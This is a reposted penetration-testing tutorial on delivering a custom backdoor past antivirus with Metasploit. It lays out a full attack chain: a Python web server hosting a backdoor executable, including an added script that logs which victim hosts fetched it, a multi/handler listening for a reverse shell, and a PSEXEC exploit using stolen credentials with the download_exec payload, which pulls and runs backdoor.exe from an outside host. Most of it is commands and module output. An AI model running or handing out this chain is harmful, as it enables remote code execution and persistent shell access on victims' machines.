Metasploit - Custom Payloads
Source: Internet  Published: 庄子思想 知乎  Editor: 程序博客网  Time: 2024/06/15 03:51
You launch your Metasploit exploit. It looks like it is working but no session is created. What happened? Your exploit just got popped by antivirus software. Such a bummer. Antivirus software is a hurdle that you have to overcome as a penetration tester, modeling the techniques of the real-world bad guys. The best way to avoid antivirus software is to stop using a payload that someone else created. Time and time again, penetration testers find they have a basic need to use custom payloads.
Create your own custom payload, and then you won't have to worry about an AV signature catching your payload and eating it! It is easy and it gives you the flexibility to go after any target. There are lots of tools and articles to help you do so, including the Veil framework.
So you build your own custom payload, now what? How do you operationalize your payload? How do you deliver it to a target and execute it? There are lots of ways to deliver a custom payload, but I’ll cover one of the easiest and most flexible options here.
Metasploit's Download/Exec payload is a great option for delivering a custom payload to a target. You can use it with most of Metasploit's exploits, including memory corruption exploits, misconfiguration exploits, and authenticated attacks like PSEXEC. This flexibility means that, with this Metasploit payload, you can use your custom payload wherever you would otherwise use Meterpreter.
To use the Download/Exec payload, you will need to do three things. First, you'll need a website from which the victim can download your custom backdoor. Second, you will need to set up a Metasploit handler to receive the connection from your custom backdoor. Lastly, you'll need an exploit to deliver your custom payload. Let's take a look at each of the steps.
A website to provide the “Download” in the Download/Exec payload
You have lots of options for a website to deliver your payloads. Any time I need a "quick and easy" website I use Python. The first step to starting the Python web server is to change to the directory that contains the files you want to make available for download. Then the command "python -m SimpleHTTPServer 8000" starts a web server. The files in that directory can then be downloaded using any web browser. You can set up this server on any computer that has Python installed. Here, I've started a web server listening on port 8000. When the exploit runs you'll see the download being logged by your web server. Here you can see the victim 10.1.1.170 downloading a copy of "pythonbackdoor.exe".
[nixawk@core ~]$ python -m 'SimpleHTTPServer' 8000
Serving HTTP on 0.0.0.0 port 8000 ...
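The following is an added example, not code from the original article: a Python 3 stand-in for the "python -m SimpleHTTPServer 8000" step (SimpleHTTPServer is the Python 2 module; in Python 3 the same thing lives in http.server). Besides serving one directory it keeps an in-memory record of every request and can parse the stock http.server access line, so after the exploit runs you can confirm which host actually fetched which file instead of eyeballing the scrollback. The log lines in SAMPLE_LOG are constructed for illustration, and the class and function names are my own.

```python
"""Added example: Python 3 file server for the "Download" half of Download/Exec,
with a record of who fetched what. Not code from the original article."""
import functools
import http.server
import re
import socketserver
import sys
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Stock BaseHTTPRequestHandler access line, e.g.
# 10.1.1.170 - - [15/Jun/2024 03:51:00] "GET /pythonbackdoor.exe HTTP/1.1" 200 -
ACCESS_LINE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})\b'
)

# Constructed sample log in the format the server below prints (not real captured output).
SAMPLE_LOG = [
    '10.1.1.170 - - [15/Jun/2024 03:50:12] "GET /missing.exe HTTP/1.1" 404 -',
    '10.1.1.170 - - [15/Jun/2024 03:51:00] "GET /pythonbackdoor.exe HTTP/1.1" 200 -',
    'this line is not an access-log entry',
]


@dataclass(frozen=True)
class Download:
    client: str
    path: str
    status: int
    when: str


def parse_access_line(line: str) -> Optional[Download]:
    """Parse one http.server access line; None if the line is in another format."""
    m = ACCESS_LINE.match(line.strip())
    if not m:
        return None
    return Download(m["client"], m["path"], int(m["status"]), m["when"])


def parse_access_log(lines: Iterable[str]) -> List[Download]:
    """Parse a whole log, skipping lines that are not access entries."""
    return [d for d in map(parse_access_line, lines) if d is not None]


def completed_downloads(downloads: Iterable[Download]) -> Dict[str, List[str]]:
    """Map each client address to the paths it fetched with HTTP 200.

    A 404 (a mistyped URL option, a file saved under the wrong name) never
    reached the target's disk, so it is deliberately left out.
    """
    got: Dict[str, List[str]] = defaultdict(list)
    for d in downloads:
        if d.status == 200:
            got[d.client].append(d.path)
    return dict(got)


class RecordingHandler(http.server.SimpleHTTPRequestHandler):
    """Behaves like SimpleHTTPServer but also records each request in memory."""

    seen: List[Download] = []  # class-level so every handler instance shares it

    def log_request(self, code="-", size="-"):
        try:
            status = int(code)  # http.HTTPStatus is an IntEnum
        except (TypeError, ValueError):
            status = -1
        self.seen.append(Download(self.client_address[0], self.path, status,
                                  self.log_date_time_string()))
        super().log_request(code, size)  # still print the stock access line


class ReusableServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True  # restart on the same port without waiting out TIME_WAIT
    daemon_threads = True


def serve(directory: str, port: int = 8000, bind: str = "0.0.0.0") -> Dict[str, List[str]]:
    """Serve `directory` until Ctrl-C, then return who successfully fetched what."""
    handler = functools.partial(RecordingHandler, directory=directory)
    with ReusableServer((bind, port), handler) as srv:
        print(f"Serving HTTP on {bind} port {port} from {directory} ...")
        try:
            srv.serve_forever()
        except KeyboardInterrupt:
            pass
    return completed_downloads(RecordingHandler.seen)


if __name__ == "__main__":
    directory = sys.argv[1] if len(sys.argv) > 1 else "."
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8000
    for client, paths in serve(directory, port).items():
        print(f"{client} fetched: {', '.join(paths)}")
```

Saved as, say, serve_payload.py (a name of my choosing), "python3 serve_payload.py /path/to/files 8000" behaves like the SimpleHTTPServer command above and, on Ctrl-C, prints a per-host summary of completed downloads; parse_access_log can be pointed at a saved log from the stock server as well.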
Start a handler to receive your shell
Starting the multi/handler requires a few simple commands. First is "use multi/handler". Next, set your payload to one that is compatible with the custom payload you created. If your payload contains Meterpreter, then you will "set payload windows/meterpreter/reverse_tcp". If it is a command prompt, then you would type "set payload windows/shell/reverse_tcp". Since my Python backdoor sends a command prompt, the correct payload here is "windows/shell/reverse_tcp". This "single" payload doesn't use a stager and expects a connection from a shell. Do not confuse this with "windows/shell_reverse_tcp", since "windows/shell_reverse_tcp" is expecting a connection from a stager, not a shell.
Setting LHOST to 0.0.0.0 will cause Metasploit to listen on all the network addresses on your host. This is a good shortcut for single payloads, but it is not a good idea for staged payloads. Some stagers, for example /*/reverse_http, require an actual routed address so that the stager knows where to download the next stage. Then set your LPORT to the port your custom payload is hardcoded to connect to. In this example, my payload is set to send a command prompt to port 80. Finally, you'll need to start the multi/handler, but our work in Metasploit is still not finished, so it has to run as a background task. To do this, the "-j" option to the exploit command starts the multi/handler as a "job" that runs in the background.
msf > use multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     0.0.0.0          yes       The listen address
   LPORT     80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
Exploit the target and deliver the payload
With your handler in the background waiting to receive a connection, you're ready to exploit the target. Just about any exploit could be used, but remembering my Penetration Tester's Pledge, I'll use PSEXEC. First, I use "windows/smb/psexec" and set it up with the correct username and password for the target. Then I set my payload by typing "set PAYLOAD windows/download_exec". The options are pretty simple. You set the URL to point to the custom payload on the web server that you set up in step 1. You can change the name of the file that will be saved to the target if you like.
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                 192.168.1.100    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass               testpass         no        The password for the specified username
   SMBUser               testuser         no        The username to authenticate as


Payload options (windows/download_exec):

   Name      Current Setting                         Required  Description
   ----      ---------------                         --------  -----------
   EXE       backdoor.exe                            yes       Filename to save & run executable on target system
   EXITFUNC  process                                 yes       Exit technique (accepted: seh, thread, process, none)
   URL       http://192.168.1.108:8000/backdoor.exe  yes       The pre-encoded URL to the executable


Exploit target:

   Id  Name
   --  ----
   0   Automatic
When you type “exploit” you will see it download from your website and a shell will appear in your handler. Game On. Let the pivots begin.